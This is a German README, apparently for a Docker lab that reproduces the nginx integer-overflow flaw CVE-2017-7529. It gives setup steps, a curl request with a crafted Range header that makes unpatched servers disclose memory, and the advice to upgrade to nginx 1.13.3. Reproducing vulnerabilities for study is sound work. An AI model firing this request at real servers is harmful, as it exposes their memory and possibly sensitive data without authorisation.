
Docker-basierte Reproduktionsumgebung für die CVE-2017-7529 Nginx Integer Overflow Schwachstelle, die eine Offenlegung von Informationen durch manipulierte Range-Header demonstriert, mit einer schrittweisen Exploitation-Anleitung.
Nginx ist ein weit verbreiteter Open-Source-Webserver, der als Hochleistungs-Webserver, Reverse Proxy, Cache-Server usw. eingesetzt wird.
In Nginx-Versionen bis 1.13.2 gibt es eine Sicherheitslücke, die aufgrund eines Integer-Überlaufs es einem Angreifer ermöglicht, den Range-Header zu manipulieren, um Speicherfragmente oder sensible Informationen außerhalb des ursprünglichen Antwortbereichs preiszugeben.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
Diese Sicherheitslücke kann allein durch eine einfache HTTP-Anfrage zu einer Informationsoffenlegung (Information Disclosure) führen.
Wenn sensible Konfigurationsinformationen oder andere potenziell auslesbare Daten enthalten sind, kann dies zu einem schwerwiegenden Sicherheitsvorfall führen.
Patch: Es wird empfohlen, auf Nginx 1.13.3 oder höher zu aktualisieren.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서